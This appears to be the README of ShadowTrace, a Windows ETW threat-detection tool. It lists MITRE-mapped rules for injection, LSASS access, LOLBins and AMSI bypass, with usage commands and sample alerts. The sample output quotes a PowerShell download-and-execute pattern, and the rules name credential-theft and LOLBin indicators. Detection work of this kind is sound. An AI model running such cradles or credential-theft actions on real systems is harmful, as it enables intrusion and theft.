╔════════════════════════════════════════════════════════════════╗
║ ShadowTrace — ETW Real-Time Threat Detection ║
║ Process · DNS · PowerShell · AMSI · LOLBins · Credentials ║
║ Author: mazen91111 (parasite911) · Blue/Red Team ║
╚════════════════════════════════════════════════════════════════╝
Your silent watchdog on the kernel event bus.
Monitors Windows ETW (Event Tracing for Windows) providers to detect process injection,
credential theft, LOLBins abuse, AMSI bypass attempts, and suspicious PowerShell —
all mapped to MITRE ATT&CK with severity-based alerting.
| Rule | MITRE ID | Severity | Description |
|---|---|---|---|
| Remote Thread Injection | T1055.003 | 🔴 CRITICAL | CreateRemoteThread in foreign process |
| Process Hollowing | T1055.012 | 🔴 CRITICAL | NtUnmapViewOfSection + WriteProcessMemory |
| APC Queue Injection | T1055.004 | 🟠 HIGH | QueueUserAPC targeting remote thread |
| LSASS Memory Access | T1003.001 | 🔴 CRITICAL | Process reading lsass.exe memory |
| SAM Hive Access | T1003.002 | 🟠 HIGH | Direct SAM/SECURITY registry access |
| LOLBin Execution | T1218 | 🟠 HIGH | mshta, certutil, rundll32, etc. |
| Encoded PowerShell | T1059.001 | 🟠 HIGH | -EncodedCommand, IEX, DownloadString |
| AMSI Bypass | T1562.001 | 🔴 CRITICAL | AmsiScanBuffer patching attempt |
| Registry Persistence | T1547.001 | 🟡 MEDIUM | Run key modification |
| Scheduled Task | T1053.005 | 🟡 MEDIUM | schtasks /create for persistence |
| DNS Exfiltration | T1048.003 | 🟠 HIGH | High-entropy/long DNS subdomains |
| Provider | Events |
|---|---|
| Kernel-Process | ProcessStart, ProcessStop, ImageLoad |
| Kernel-File | FileCreate, FileDelete |
| DNS-Client | DNSQuery, DNSResponse |
| PowerShell | ScriptBlockLog, CommandInvocation |
| AMSI | AMSIScan, AMSIResult |
| Security-Auditing | Logon, PrivilegeUse |
| Sysmon | ProcessCreate, NetworkConnect, RegistryEvent |
git clone https://github.com/mazen91111/ShadowTrace.git
cd ShadowTrace
pip install -r requirements.txt
⚠️ Requires Windows and Administrator for ETW access.
# Start real-time threat monitoring (simulation)
python shadowtrace.py --monitor
# List all detection rules with MITRE IDs
python shadowtrace.py --list-rules
# List ETW providers and GUIDs
python shadowtrace.py --list-providers
# Monitor for 30 seconds
python shadowtrace.py --monitor --duration 30══════════════════════════════════════════════════════════════════════════
👁️ ShadowTrace — Real-Time Threat Monitor
══════════════════════════════════════════════════════════════════════════
[ LIVE EVENT STREAM ]
──────────────────────────────────────────────────────────────────────
▐ 14:23:05.12 [CRITICAL]
▐ ⚠ Process Injection — Remote Thread Creation
▐ MITRE: T1055.003 │ PID: 892 │ svchost.exe
▐ SourcePID: 4812 → TargetPID: 892 (CreateRemoteThread)
▐ Matched: CreateRemoteThread
──────────────────────────────────────────────────────────────────────
▐ 14:23:05.55 [HIGH]
▐ ⚠ Suspicious PowerShell — Encoded Command
▐ MITRE: T1059.001 │ PID: 4812 │ powershell.exe
▐ ScriptBlock: IEX (New-Object Net.WebClient).DownloadString(...)
▐ Matched: IEX, Net.WebClient, DownloadString
──────────────────────────────────────────────────────────────────────
══════════════════════════════════════════════════════════════════════════
👁️ ShadowTrace — Threat Detection Summary
══════════════════════════════════════════════════════════════════════════
Events Analyzed : 10
Alerts Triggered : 8
[ SEVERITY BREAKDOWN ]
CRITICAL [█████████░░░░░░░░░░░░░░░░░░░░░] 3
HIGH [████████████░░░░░░░░░░░░░░░░░░] 4
MEDIUM [███░░░░░░░░░░░░░░░░░░░░░░░░░░░] 1
[ MITRE ATT&CK COVERAGE ]
T1003.001 ● (1 alert)
T1055.003 ● (1 alert)
T1059.001 ●● (2 alerts)
T1218 ●● (2 alerts)
T1562.001 ● (1 alert)
Mazen Obed — @mazen91111
Threat Detection | Windows Internals | Blue Team & Red Team
For authorized security research and defense operations ONLY.
Use responsibly on systems you own or are authorized to monitor.
MIT License